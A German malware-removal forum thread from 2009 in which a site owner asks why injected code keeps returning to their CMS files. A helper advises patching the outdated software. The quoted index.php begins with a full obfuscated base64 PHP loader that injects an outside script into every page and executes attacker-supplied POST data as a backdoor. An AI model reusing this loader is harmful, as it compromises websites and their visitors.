Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Massive Probleme mit bösen Javascripte Code auf meinen webseiten

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 23.10.2009, 17:10   #1
sunshine2009
 
Massive Probleme mit bösen Javascripte Code auf meinen webseiten - Standard

Massive Probleme mit bösen Javascripte Code auf meinen webseiten



Könnt ihr mir bitte helfen. Ich bin am verzweifeln. Habe auf mehreren CMS-Systemen auf meinen Webspaceanbietern Probleme die ich nicht wegkriege. Habe den bösen scriptcode und sogar meine Paßwörter schon geändert, aber immer wieder nach kurzer Zeit ist dieser Code wieder in mehreren Php-Datein und umbenannten jpg.php neu vorhanden. Wie kann ich das dauerhaft wegkriegen.

Das Scriptbeispiel hier heißt: Vcard und ist ein Postamt
------------------------------------------------------------------------
Hier Mal der Code und die Webseiteenfehlermeldung dazu:


<?php eval(base64_decode('aWYoIWlzc2V0KCR5eXczMSkpe2Z1bmN0aW9uIHl5dzMoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaC gkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKC R2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFte Pl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XH Mqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNl KCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyeHZaMjlwYzIxa1pYTnBaMjR1WTI5dEwySnNiMmN2WTI5dWRHRmpkQzExY3k1d2FIQWdQand2YzJOeWFYQjBQZz09Jy ksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJu ICRzO31mdW5jdGlvbiB5eXczMigkYSwkYiwkYywkZCl7Z2xvYmFsICR5eXczMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkeXl3MzEpKWNhbGxfdXNlcl9mdW5jKCR5eXczMSwkYSwkYi wkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd5eXczJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRz W109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbm RfY2xlYW4oKTt9b2Jfc3RhcnQoJ3l5dzMnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0keXl3M2w9KCgkYT1Ac2V0X2Vy cm9yX2hhbmRsZXIoJ3l5dzMyJykpIT0neXl3MzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
define('IN_VCARD', true);
define('CURR_PAGE','index.php');

$templatesused = 'page_index,page_index_antispam,list_new_card_item,list_new_card';
$chaceitemused = 'get_html_day_topcard(),get_html_week_topcard(),get_html_newcard(),get_categories_table(),get_categories_table(1)';

require_once('./lib.inc.php');
$page_title_info = $msg['page_desc_homepage'];
require_once(VCARD_ROOT_PATH.'include/user_header.inc.php');

if (empty($cfg['gallery_table_cols']))
{
$cfg['gallery_table_cols'] = 3;
}
if ($cfg['antispam_check'])
{
eval('$page_index_antispam = "'. $TEMPLATE_Site->get_template('page_index_antispam') .'";');
}

if ($cfg['vcachesys'] == 1) //CACHE
{
$list_top_daily_cards = $DBCache_site->get("get_html_day_topcard()", __LINE__, __FILE__);
$list_top_week_cards = $DBCache_site->get("get_html_week_topcard()", __LINE__, __FILE__);
$list_new_cards = $DBCache_site->get("get_html_newcard()", __LINE__, __FILE__);
$list_table_cats = $DBCache_site->get("get_categories_table()", __LINE__, __FILE__);
$list_table_main_cats = $DBCache_site->get("get_categories_table(1)", __LINE__, __FILE__);
}
else
{
$list_top_daily_cards = ($cfg['gallery_toplist_useday'] == 1) ? get_html_day_topcard() : '';
$list_top_week_cards = ($cfg['gallery_toplist_useweek'] == 1)? get_html_week_topcard() : '';
$list_new_cards = get_html_newcard();
$list_table_main_cats = '';
$list_table_cats = '';
get_categories_table();
}


//$totalcards_sent = $DB_site->count_records("". TBL_STATS_ECARD ."");
//$total_registered_users = $DB_site->count_records("". TBL_USR_PROFILE ."");
//$totalcards_in_site = $DB_site->count_records("". TBL_CARDS_DATA ."");
eval('$TEMPLATE_Site->make_output("'. $TEMPLATE_Site->get_template('page_index') .'");');

require_once(VCARD_ROOT_PATH.'include/user_footer.inc.php');
?>

Alt 23.10.2009, 18:46   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Massive Probleme mit bösen Javascripte Code auf meinen webseiten - Standard

Massive Probleme mit bösen Javascripte Code auf meinen webseiten



Hallo und

Zitat:
Habe den bösen scriptcode und sogar meine Paßwörter schon geändert, aber immer wieder nach kurzer Zeit ist dieser Code wieder in mehreren Php-Datein und umbenannten jpg.php neu vorhanden. Wie kann ich das dauerhaft wegkriegen.
Durch ein paar Scripte löschen und Passwörter ändern wirds nicht getan sein.
Welches CMS verwendest Du in welcher Version, Du musst auch für solche Software ständig Patches einspielen, weil in alten Versionen Sicherheitslücken sind, die eben für sowas verwendet werden können.
__________________

__________________

Antwort

Themen zu Massive Probleme mit bösen Javascripte Code auf meinen webseiten
antispam, bieter, check, code, data, dauerhaft, fehlermeldung, file, geändert, homepage, html, immer wieder, index.php, kurzer, massive, mehreren, neu, probleme, profile, records, users, verzweifel, webseite, webseiten




Ähnliche Themen: Massive Probleme mit bösen Javascripte Code auf meinen webseiten


  1. Massive Performance Probleme bei jedem Spiel.
    Log-Analyse und Auswertung - 10.05.2015 (5)
  2. Massive Probleme mit Bluescreens..
    Plagegeister aller Art und deren Bekämpfung - 19.04.2014 (3)
  3. Massive USB Probleme (WIN 7) / sowohl onboard USB als auch PCI-e USB 3.0 Karte
    Alles rund um Windows - 07.04.2014 (6)
  4. Wieder massive Probleme
    Plagegeister aller Art und deren Bekämpfung - 20.06.2013 (9)
  5. win 7 home premium / massive boot probleme / cd dvd Laufwerk verschunden / sehr langsames internet
    Log-Analyse und Auswertung - 18.04.2013 (1)
  6. Windows XP nach Neustart massive Probleme
    Alles rund um Windows - 01.01.2013 (24)
  7. Massive Systemauslastung/ Google leitet ungewollt auf andere Webseiten weiter
    Plagegeister aller Art und deren Bekämpfung - 26.12.2009 (3)
  8. Probleme mit Installation von Vista SP2, Fehler Code 80096004
    Alles rund um Windows - 06.08.2009 (41)
  9. Massive Probleme trotz Neuaufsetzen?
    Mülltonne - 04.01.2009 (0)
  10. Massive I-Net Probleme - Benötige Hilfe
    Log-Analyse und Auswertung - 08.09.2008 (15)
  11. Ständig neue Trojaner/Viren auf meinen Webseiten
    Log-Analyse und Auswertung - 19.05.2008 (9)
  12. Massive Probleme beim surfen, Error 404, langes oder unvollständiges laden
    Log-Analyse und Auswertung - 07.03.2008 (0)
  13. Nach Updatevorgang beim Ausschalten massive Probleme
    Alles rund um Windows - 15.08.2007 (7)
  14. Bitte durchsehen - hab massive PC Probleme
    Log-Analyse und Auswertung - 24.03.2006 (9)
  15. Massive Probleme mit dem Rechner
    Log-Analyse und Auswertung - 07.11.2005 (3)
  16. probleme mit bösen registry einträgen! Wie bekomme ich das weg?
    Plagegeister aller Art und deren Bekämpfung - 10.08.2005 (13)
  17. Massive/hartnaeckige PC-Probleme
    Netzwerk und Hardware - 25.07.2003 (10)

Zum Thema Massive Probleme mit bösen Javascripte Code auf meinen webseiten - Könnt ihr mir bitte helfen. Ich bin am verzweifeln. Habe auf mehreren CMS-Systemen auf meinen Webspaceanbietern Probleme die ich nicht wegkriege. Habe den bösen scriptcode und sogar meine Paßwörter schon - Massive Probleme mit bösen Javascripte Code auf meinen webseiten...
Archiv
Du betrachtest: Massive Probleme mit bösen Javascripte Code auf meinen webseiten auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.